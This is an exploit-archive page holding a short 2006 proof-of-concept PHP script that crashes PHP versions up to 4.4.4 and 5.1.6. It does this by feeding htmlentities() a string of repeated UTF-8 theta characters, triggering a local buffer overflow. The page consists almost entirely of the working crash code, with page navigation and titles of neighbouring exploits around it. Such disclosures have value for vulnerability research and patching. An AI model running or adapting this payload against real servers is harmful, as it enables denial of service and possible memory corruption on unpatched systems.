[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHP <= 4.4.4/5.1.6 htmlentities() Local Buffer Overflow PoC
# Published : 2006-11-27
# Author : Nick Kezhaya
# Previous Title : 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow PoC
# Next Title : UniversalFTP 1.0.50 (MKD) Remote Denial of Service Exploit


<?php
	/*	    Nick Kezhaya	*/
	/*    www.whitepaperclip.com 	*/
	
	//instantiate a string
	$str1 = "";
	
	for($i=0; $i < 64; $i++) {
		$str1 .= toUTF(977); //MUST start with 977 before bit-shifting
	}
	
	htmlentities($str1, ENT_NOQUOTES, "UTF-8"); //DoS here
	/*
		htmlentities() method automatically assumes
		it is a max of 8 chars.  uses greek theta
		character bug from UTF-8
	*/
	
?>

<?php
	function toUTF($x) {
		return chr(($x >> 6) + 192) . chr(($x & 63) + 128);
	}
?>

# www.Syue.com [2006-11-27]